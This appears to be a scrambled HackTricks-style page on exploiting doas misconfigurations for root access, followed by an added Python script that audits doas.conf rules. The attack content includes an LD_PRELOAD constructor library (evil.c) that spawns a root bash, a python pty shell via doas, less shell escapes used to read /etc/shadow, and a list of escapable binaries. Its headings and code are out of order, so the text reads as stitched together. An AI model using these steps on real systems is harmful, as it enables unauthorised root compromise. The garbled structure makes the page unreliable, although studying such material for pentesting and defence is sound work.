HackTricks Doas

    permit keepenv user1 as root

Compile a malicious lib:

— HackTricks

Want more? Check out the HackTricks Linux Privilege Escalation guide for deeper dives.

    doas /usr/bin/python3 -c 'import pty;pty.spawn("/bin/sh")'

Many binaries allow shell escapes.

    // evil.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    __attribute__((constructor)) void init() {
        setuid(0);
        setgid(0);
        system("/bin/bash");
    }

    permit user1 as root cmd /usr/bin/less

    doas less /etc/hosts
    # then type: !/bin/bash

Known binaries for escapes: less, more, vi, vim, nano, awk, find, man, git, tmux, screen, ftp, irb, lua, perl, python, ruby, scp, tar.

If keepenv is set, doas keeps LD_PRELOAD, LD_LIBRARY_PATH, PYTHONPATH, etc.

    doas /usr/bin/less /etc/shadow
    # inside less: !/bin/sh

Or Python bypass:

Example script:

    #!/bin/sh
    doas /usr/bin/chown user "$1"

Exploit:

In this post, we’ll break down how doas works, where to find it, and how to abuse it for privilege escalation during a pentest.

doas originated on OpenBSD. It allows users to execute commands as another user (usually root) with a minimal configuration file: /etc/doas.conf

    doas -s
    # or
    doas /bin/sh

If the config allows a wildcard path, you might inject arguments.
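To review a doas.conf for the rule patterns this post describes (keepenv, rules with no cmd, commands with known shell escapes, and commands with no args restriction), the audit script below is an added example, not part of the original post. The sample configuration is constructed, and parse_rule and audit are hypothetical helper names. It relies on the doas.conf(5) behaviour that a bare args keyword means the command must be run without arguments.

```python
import re
import shlex
from itertools import takewhile

# Binaries this page lists as offering shell escapes.
ESCAPE_BINARIES = set(("less more vi vim nano awk find man git tmux screen "
                       "ftp irb lua perl python ruby scp tar").split())
FLAGS = {"nopass", "nolog", "persist", "keepenv"}  # doas.conf rule options

# Constructed sample configuration (not taken from a real host).
SAMPLE = """\
permit keepenv user1 as root
permit user1 as root cmd /usr/bin/less
permit user1 as root cmd /usr/bin/chown
permit :wheel as root cmd /sbin/reboot args
"""

def parse_rule(line):
    """Parse one doas.conf rule, or return None for blank and comment lines."""
    line = re.sub(r"setenv\s*\{[^}]*\}", "", line)  # setenv block is not audited
    tok = shlex.split(line, comments=True)
    if not tok or tok[0] not in ("permit", "deny"):
        return None
    opts = list(takewhile(FLAGS.__contains__, tok[1:]))
    rest = tok[len(opts) + 2:]  # drop action, options and identity
    rest = rest[2:] if rest[:1] == ["as"] else rest  # drop "as <target>"
    has_cmd = rest[:1] == ["cmd"] and len(rest) > 1  # args: None = any, [] = none
    return {"action": tok[0], "options": set(opts),
            "cmd": rest[1] if has_cmd else None,
            "args": rest[3:] if has_cmd and rest[2:3] == ["args"] else None}

def audit(conf_text):
    """Return (line_number, finding) pairs for risky permit rules."""
    out = []
    for n, line in enumerate(conf_text.splitlines(), 1):
        rule = parse_rule(line)
        if not rule or rule["action"] != "permit":
            continue
        cmd = rule["cmd"]
        base = (cmd or "").rsplit("/", 1)[-1].rstrip("0123456789.")  # python3 -> python
        checks = [("keepenv" in rule["options"], "keepenv passes the caller's environment"),
                  (cmd is None, "no cmd: any command, including a shell, is allowed"),
                  (base in ESCAPE_BINARIES, f"{cmd} has a known shell escape"),
                  (cmd and rule["args"] is None, f"{cmd} takes arbitrary arguments")]
        out += [(n, msg) for hit, msg in checks if hit]
    return out

if __name__ == "__main__":
    print("\n".join(f"line {n}: {msg}" for n, msg in audit(SAMPLE)))
```

Run it against the contents of /etc/doas.conf; each finding names the line of the rule to tighten, for example by dropping keepenv or pinning the allowed arguments with args.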

Created by Administrator on 2008-11-23 08:06
Last modified by Administrator on 2026-01-06 18:15